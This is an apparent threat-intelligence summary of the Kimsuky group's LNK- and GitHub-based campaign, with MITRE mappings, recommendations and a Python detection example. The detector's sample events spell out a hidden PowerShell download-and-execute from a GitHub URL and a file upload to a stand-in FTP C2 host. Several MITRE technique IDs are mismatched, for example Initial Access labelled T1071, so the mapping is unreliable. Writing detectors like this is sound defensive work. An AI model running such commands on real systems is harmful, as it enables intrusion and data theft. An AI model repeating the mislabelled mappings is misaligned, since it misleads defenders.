Summary:
APT-C-55, also known as Kimsuky, is a cyber threat group that has evolved its tactics to target various countries, including South Korea, the US, Russia, and Europe, primarily for intelligence theft. Recent findings reveal its use of GitHub as a platform for distributing malicious payloads, highlighting the group's evolving techniques and its persistence as a threat.
Key points:
Kimsuky has been active since 2013, targeting think tanks, government agencies, media, and academic institutions.
The group has expanded its attack scope to include countries beyond South Korea.
Recent attacks utilize LNK files to deliver malicious payloads.
Analysis revealed a malicious URL hosted on GitHub, indicating a new strategy for payload distribution.
Malicious scripts were found to collect sensitive information and upload it to remote servers.
Attacks involve sophisticated obfuscation techniques to evade detection.
Recommendations include network monitoring, process auditing, and employee training on phishing awareness.
MITRE Techniques:
Initial Access (T1071): Utilizes malicious documents as the initial attack vector.
Command and Control (T1071): Uses GitHub for command and control communications and payload distribution.
Data Collection (T1056): Collects sensitive information such as file lists and network configurations.
Data Exfiltration (T1041): Uploads collected data to remote FTP servers.
Execution (T1059): Executes PowerShell commands to download and run additional malicious payloads.
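The process-auditing recommendation above can be turned into concrete triage logic. The following is an added example written for this summary, not code from the original research: it scores constructed Sysmon-style process-creation events against the chain the report describes (LNK launched from Explorer spawning hidden PowerShell, a stage fetched from a raw GitHub URL, and an FTP upload). The event field names, the GitHub account and repository, the FTP host and the file paths are all assumptions or placeholders.

```python
import re

# Constructed process-creation events (assumption: fields parent, image, cmdline).
# The GitHub path, FTP host and file paths are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                ".DownloadString('https://raw.githubusercontent.com/PLACEHOLDER-USER/"
                "PLACEHOLDER-REPO/main/stage1.txt')\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c \"(New-Object Net.WebClient).UploadFile("
                "'ftp://c2.example.invalid/up', 'C:\\Users\\u\\info.txt')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

# Each rule mirrors one link of the reported chain; a predicate returns truthy on a hit.
RULES = [
    ("powershell_from_explorer_hidden",
     lambda e: e["image"].lower() == "powershell.exe"
     and e["parent"].lower() == "explorer.exe"
     and re.search(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass",
                   e["cmdline"], re.I)),
    ("github_raw_download_in_cmdline",
     lambda e: re.search(r"raw\.githubusercontent\.com/\S+\.txt", e["cmdline"], re.I)
     and re.search(r"downloadstring|invoke-webrequest|\biwr\b|\biex\b", e["cmdline"], re.I)),
    ("ftp_upload_in_cmdline",
     lambda e: re.search(r"ftp://", e["cmdline"], re.I)
     and re.search(r"uploadfile|uploadstring|uploaddata", e["cmdline"], re.I)),
]


def evaluate(event):
    """Return the names of every rule matched by a single event, in rule order."""
    return [name for name, pred in RULES if pred(event)]


def triage(events):
    """Return (index, matched_rule_names) for each event that hits at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        matched = evaluate(ev)
        if matched:
            hits.append((i, matched))
    return hits


if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(names)}")
```

A benign Explorer-launched script (event 2) is not flagged because it carries neither window-hiding nor execution-policy-bypass flags; in production, the same predicates would run over the endpoint telemetry feed rather than the embedded sample.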
IoC:
Full Research: https://mp.weixin.qq.com/s/GzMoR8jKjelzuj5BPhpJYA